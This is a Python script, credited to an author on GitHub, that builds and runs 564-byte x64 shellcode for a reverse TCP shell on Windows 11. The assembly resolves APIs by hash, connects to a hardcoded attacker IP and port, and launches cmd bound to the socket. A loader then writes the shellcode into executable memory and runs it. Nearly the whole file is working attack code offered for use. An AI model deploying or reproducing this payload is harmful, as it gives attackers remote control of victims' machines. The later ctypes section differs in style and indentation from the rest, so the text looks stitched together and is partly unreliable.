#!/usr/bin/python
#
# Description: Windows 11 x64 Reverse TCP Shell
# Architecture: x64
# OS: Microsoft Windows
# Author: hvictor (Victor Huerlimann)
# Shellcode Size: 564 bytes
# Repository:https://github.com/hvictor/shellcode-x64
#
# Special thanks to wetw0rk (Milton Valencia), from whom I drew inspiration for the indicated parts of the code: https://github.com/wetw0rk/Sickle
#
# Note: You will have to modify the line 193 of this file according to the attacker's IP and port:
# mov r9, 0x7901A8C029230002 # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2]
# The high DWORD is the IPv4 address in little-endian, followed by the 2-bytes port in little-endian, and the 2-bytes address family.
import ctypes, struct
from ctypes import wintypes
from keystone import *
CODE = (
'''
start:
mov rbp, rsp
sub rsp, 1600
resolve_kernel32:
mov dl, 0x4b # dl = 'K'
mov rcx, 0x60 #
mov r8, gs:[rcx] # R8 = address of PEB
mov rdi, [r8 + 0x18] # RDI = address of _PEB_LDR_DATA
mov rdi, [rdi + 0x30] # RDI = address of InInitializationOrderModuleList (first _LIST_ENTRY)
search:
xor rcx, rcx
mov rbx, [rdi + 0x10] # RBX = DllBase
mov rsi, [rdi + 0x40] # RSI = address of UNICODE string BaseDllName.Buffer
mov rdi, [rdi] # RDI = address of the next _LIST_ENTRY
cmp [rsi + 0x18], cx # Compare the 24-th UNICODE char with NULL
jne search # If length of BaseDllName is not 12 UNICODE chars, continue searching
cmp [rsi], dl # Compare the first UNICODE char with 'K'
jne search # If the first UNICODE char is not 'K', continue searching
find_function_jmp:
jmp callback # Jump to callback to make a negative (null byte free) call to get_find_function_addr
get_find_function_addr:
pop rsi # The address of find_function is popped in RSI
mov [rbp + 0x8], rsi # The address of find_function is stored at (RBP + 8)
jmp resolve_k32_sym # Once the address of find_function has been stored, proceed with the resolution of kernel32 symbols
callback:
call get_find_function_addr # When this call is done, the address of the 1st instruction find_function (add rsp, 8) is pushed to the stack
# This is the address of find_function, and it will be popped in ESI (see get_find_function_addr).
find_function:
# Current Stack Layout:
#---------------------------------------------------------------------------
# QWORD: Return Address (addr of instruction after "call find_function", see below)
# QWORD: Number of hash bytes + 8 <- RSP
# QWORD: <0x00000000> <Hash of CreateProcessA (4 bytes)>
# QWORD: <0x00000000> <Hash of LoadLibraryA (4 bytes)>
# ...
# QWORD: 0x0000000000000000
#---------------------------------------------------------------------------
add rsp, 8 # Point RSP to (Number of hash bytes + 8)
pop rax # RAX = Number of hash bytes + 8
push -1 # Write -1 on the stack instead of (Number of hash bytes + 8)
add rsp, rax # Add (Number of hash bytes + 8) to RSP: it now points to 0x0000000000000000
# Current Stack Layout:
#---------------------------------------------------------------------------
# QWORD: Return Address
# QWORD: 0xffffffffffffffff
# QWORD: <0x00000000> <Hash of CreateProcessA (4 bytes)>
# QWORD: <0x00000000> <Hash of LoadLibraryA (4 bytes)>
# ...
# QWORD: 0x0000000000000000 <- RSP
#---------------------------------------------------------------------------
find_function_loop2:
xor rax, rax
xor rdi, rdi
mov eax, [rbx + 0x3c] # EAX = offset to the PE Header of the module = e_lfanew
mov edi, [rbx + rax + 0x88] # EDI = RVA of the Export Directory Table of the module (1st field: VirtualAddress)
add rdi, rbx # RDI = VMA of the Export Directory Table of the module
mov ecx, [rdi + 24] # ECX = NumberOfNames (field of the Export Directory Table of the module)
mov eax, [rdi + 32] # EAX = RVA of AddressOfNames (array of Name Addresses, field of the Export Directory Table)
add rax, rbx # EAX = VMA of AddressOfNames
mov [rbp - 8], rax # Save the VMA of AddressOfNames at (EBP - 8): this location is never touched for anything else
find_function_loop:
dec ecx # Initially, ECX = NumberOfNames: decrement to get the index of the last name
mov rax, [rbp - 8] # EAX = VMA of AddressOfNames
mov esi, [rax + rcx * 4] # ESI = RVA of the current Symbol Name
add rsi, rbx # RSI = VMA of the current Symbol Name
compute_hash:
xor rax, rax # EAX = 0
cdq # If the MSB of EAX = 1: EDX = 0x11111111
# If the MSB of EAX = 0: EDX = 0x00000000 -> fills EDX with the sign of EAX
# In this case, EDX = 0x00000000 because EAX = 0x00000000
compute_hash_repeat:
ror edx, 0xd # Right-shift EDX of 13 bits
add edx, eax # EDX += current EAX value
lodsb # Load the byte pointed by ESI into AL
test al, al # Test if the NULL terminator of the Symbol Name has been reached
jnz compute_hash_repeat # If the NULL terminator has been reached (ZF = 1), proceed to hash comparison
# Else, perform the next iteration of the hash-computation algorithm
# At this point, EDX contains the computed hash of the current symbol
find_function_compare:
cmp edx, [rsp - 8] # Compare the computed hash with the hash of the wanted symbol
jnz find_function_loop # If ZF = 0, the hash is different: proceed with the next name from AddressOfNames
# If ZF = 1, the hash is equal: symbol found: continue hereby
mov edx, [rdi + 36] # EDX = RVA of the AddressOfNameOrdinals array
add rdx, rbx # RDX = VMA of the AddressOfNameOrdinals array
mov cx, [rdx + 2 * rcx] # CX = Symbol's Ordinal (lower 16 bits of ECX)
mov edx, [rdi + 28] # EDX = RVA of the AddressOfFunctions array
add rdx, rbx # RDX = VMA of the AddressOfFunctions array
mov eax, [rdx + 4 * rcx] # EAX = AddressOfFunctions[ordinal] = RVA of the wanted symbol
add rax, rbx # EAX = VMA of the wanted symbol
push rax # Push the wanted symbol's VMA onto the stack:
# ATTENTION: The symbol's VMA overwrites its Hash on the stack!
mov rax, [rsp - 8]
cmp rax, -1 # If *(RSP - 8) is -1: ZF = 1: all wanted symbols have been resolved
jnz find_function_loop2 # Until all wanted symbols have been resolved, continue looping
find_function_finish: # When we get here, all wanted symbols have been resolved: their VMAs are on the stack
sub rsp, 16 # Point RSP to the Return Address of find_function
ret # Return
resolve_k32_sym:
mov rax, 0x00000000ec0e4e8e # Hash of LoadLibraryA
push rax
mov rax, 0x0000000016b3fe72 # Hash of CreateProcessA
push rax
mov rax, 0x0000000078b5b983 # Hash of TerminateProcess
push rax
mov rax, 32 # Push 32 onto the stack
push rax
call [rbp + 8] # Call to find_function (see find_function above)
load_ws2_32:
mov rax, 0x0000000000006C6C # 'll x00 x00 x00 x00 x00 x00' (reversed)
push rax
mov rax, 0x642E32335F327377 # 'ws2_32.d' (reversed)
push rax
mov rcx, rsp # Paramter 1 = address of "ws2_32.dll"
sub rsp, 40 # Create 40 bytes of room on the stack
call [rsp + 80] # Call LoadLibraryA
nop
resolve_ws2_sym:
mov rbx, rax # RBX = Base Address of ws2_32.dll
mov rax, 0x0000000060aaf9ec # Hash of connect
push rax
mov rax, 0x00000000adf509d9 # Hash of WSASocketA
push rax
mov rax, 0x000000003bfcedcb # Hash of WSAStartup
push rax
mov rax, 32
push rax # Push 32 (Number of Hashes pushed + 8)
call [rbp + 8] # Call find_function
sub rsp, 512
call_WSAStartup:
mov rcx, 0x202 # RCX = WinSock Version 2.2
lea rdx, [rsp + 800] # RDX = Address of output WSAData structure
call [rsp + 520] # Call WSAStartup
call_WSASocketA:
mov rcx, 2 # Parameter af = 2 (AF_INET)
mov rdx, 1 # Parameter type = 1
mov r8, 6 # Parameter protocol = 6 (TCP)
xor r9, r9 # Parameter lpProtocolInfo = 0
mov [rsp + 32], r9 # Parameter dwFlags = 0
mov [rsp + 40], r9 # Parameter g = 0
call [rsp + 528] # Call WSASocketA
call_connect:
mov rsi, rax # Save socket fd in RSI
mov rcx, rax # RCX = Parameter s = socket fd created with WSSocketA
mov r8, 16 # R8 = Parameter namelen = 16
# Preparation of the sockaddr_in structure on the stack:
# struct sockaddr_in {
# QWORD: [sin_addr (4 bytes) | sin_port (2 bytes) | sin_family (2 bytes)]
# QWORD: sin_zero = [00000000 00000000]
# }
mov r9, 0x7901A8C029230002 # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2]
lea rdx, [rsp + 800] # RDX = Parameter name = Address of struct sockaddr_in
mov [rdx], r9 # Write fields: sin_addr, sin_port, sin_family
xor r9, r9
mov [rdx + 8], r9 # Write field sin_zero
call [rsp + 536] # Call connect
# Thanks to wetw0rk (Milton Valencia) for his setup_STARTUPINFOA implementation:
# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py
create_STARTUPINFOA:
lea rdi, [rsp + 800]
add rdi, 0x300
mov rbx, rdi
xor eax, eax
mov ecx, 0x20
rep stosd # Zero-out 0x80 bytes
mov eax, 0x68 # EAX = sizeof(_STARTUPINFO) = 0x68
mov [rbx], eax # Field lpStartInfo.cb = sizeof(_STARTUPINFO)
mov eax, 0x100 # EAX = STARTF_USESTDHANDLES
mov [rbx + 0x3c], eax # Field lpStartupInfo.dwFlags = STARTF_USESTDHANDLES
mov [rbx + 0x50], rsi # Field lpStartupInfo.hStdInput = socket fd
mov [rbx + 0x58], rsi # Field lpStartupInfo.hStdOutput = socket fd
mov [rbx + 0x60], rsi # Field lpStartupInfo.hStdError = socket fd
# Thanks to wetw0rk (Milton Valencia) for his call_CreateProcessA implementation:
# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py
call_CreateProccessA:
xor rax, rax
xor rcx, rcx # Parameter lpApplicationName = 0
lea rdx, [rsp + 800] # Parameter lpCommandLine
add rdx, 0x180
mov eax, 0x646d63 # EAX = "cmd"
mov [rdx], rax # Write "cmd" in the lpCommandLine parameter
xor r8, r8 # Parameter lpProcessAttributes = 0
xor r9, r9 # Parameter lpThreadAttributes = 0
xor rax, rax
inc eax
mov [rsp + 0x20], rax # Parameter bInheritHandles = 1
dec eax
mov [rsp + 0x28], rax # Parameter dwCreationFlags = 0
mov [rsp + 0x30], rax # Parameter lpEnvironment = 0
mov [rsp + 0x38], rax # Parameter lpCurrentDirectory = 0
mov [rsp + 0x40], rbx # Parameter lpStartupInfo = address of _STARTUPINFO
add rbx, 0x68
mov [rsp + 0x48], rbx # Parameter lpProcessInformation = output address, right after _STARTUPINFO
call [rsp + 616]
call_TerminateProcess:
xor rcx, rcx
dec rcx # Parameter hProcess = -1 = this process
xor rdx, rdx # Parameter uExitCode = 0 (graceful termination)
int3
call [rsp + 608] # Call TerminateProcess
'''
)
# Initialize engine in 64-bit mode
ks = Ks(KS_ARCH_X86, KS_MODE_64)
encoding, count = ks.asm(CODE)
instructions = ""
for dec in encoding:
instructions += "\\x{0:02x}".format(int(dec)).rstrip("\n")
print("Opcodes = (\"" + instructions + "\")")
print(f"Size: {len(encoding)} bytes.")
# E
# Preparation of WSAStartup (not included in the shellcode)
# Define necessary structures and constants
class WSADATA(ctypes.Structure):
    """ctypes mirror of the Winsock ``WSADATA`` structure filled in by ``WSAStartup``.

    The Windows SDK declares two member orders for this structure: on 64-bit
    builds the socket limits and the vendor pointer come directly after the
    version words, while on 32-bit builds they follow the two text buffers.
    ``iMaxSockets`` and ``iMaxUdpDg`` are 16-bit in both layouts.
    The layout is selected from the pointer size of the running interpreter.
    """

    if ctypes.sizeof(ctypes.c_void_p) == 8:
        # 64-bit layout: limits and vendor pointer precede the text buffers.
        _fields_ = [
            ("wVersion", wintypes.WORD),
            ("wHighVersion", wintypes.WORD),
            ("iMaxSockets", ctypes.c_ushort),
            ("iMaxUdpDg", ctypes.c_ushort),
            ("lpVendorInfo", ctypes.POINTER(ctypes.c_char)),
            ("szDescription", wintypes.CHAR * 257),   # WSADESCRIPTION_LEN + 1
            ("szSystemStatus", wintypes.CHAR * 129),  # WSASYS_STATUS_LEN + 1
        ]
    else:
        # 32-bit layout: text buffers first, then limits and vendor pointer.
        _fields_ = [
            ("wVersion", wintypes.WORD),
            ("wHighVersion", wintypes.WORD),
            ("szDescription", wintypes.CHAR * 257),   # WSADESCRIPTION_LEN + 1
            ("szSystemStatus", wintypes.CHAR * 129),  # WSASYS_STATUS_LEN + 1
            ("iMaxSockets", ctypes.c_ushort),
            ("iMaxUdpDg", ctypes.c_ushort),
            ("lpVendorInfo", ctypes.POINTER(ctypes.c_char)),
        ]
# Handle to ws2_32.dll, obtained through ctypes' windll loader.
ws2_32 = ctypes.windll.ws2_32
# Prototype for WSAStartup so ctypes converts arguments and the result:
#   return value - INT status code (0 means success)
#   argument 1   - WORD with the requested Winsock version (0x0202 = 2.2)
#   argument 2   - pointer to the WSADATA structure that receives the
#                  implementation details
ws2_32.WSAStartup.restype = wintypes.INT
ws2_32.WSAStartup.argtypes = [wintypes.WORD, ctypes.POINTER(WSADATA)]
def call_wsastartup():
    """Initialise Winsock 2.2 for the current process.

    Returns:
        The WSADATA instance populated by WSAStartup.

    Raises:
        RuntimeError: if WSAStartup returns a non-zero error code.
    """
    # Request version 2.2 (0x0202)
    version_requested = 0x0202
    # Output structure that WSAStartup fills in
    wsadata = WSADATA()
    result = ws2_32.WSAStartup(version_requested, ctypes.byref(wsadata))
    if result != 0:
        raise RuntimeError(f"WSAStartup failed with error code {result}")
    # Winsock packs the version as MAKEWORD(major, minor): the major number
    # is the low-order byte and the minor number is the high-order byte.
    major = wsadata.wVersion & 0xFF
    minor = wsadata.wVersion >> 8
    print(f"WSAStartup succeeded. Winsock version: {major}.{minor}")
    return wsadata
call_wsastartup()
sh = b""
for e in encoding:
sh += struct.pack("B", e)
shellcode = bytearray(sh)
# Alloco memoria eseguibile per lo shellcode
ptr = ctypes.windll.kernel32.VirtualAlloc(0x10000000,
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# Metto lo shellcode nel buffer `buf`
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
# Copio lo shellcode nella memoria allocata
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
print("Shellcode: Short Reverse Shell")
print("Shellcode address = %s" % hex(ptr))
input("\n[?] Press Enter to execute the shellcode: ")
# Eseguo lo shellcode in un nuovo thread, su cui faccio la join
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))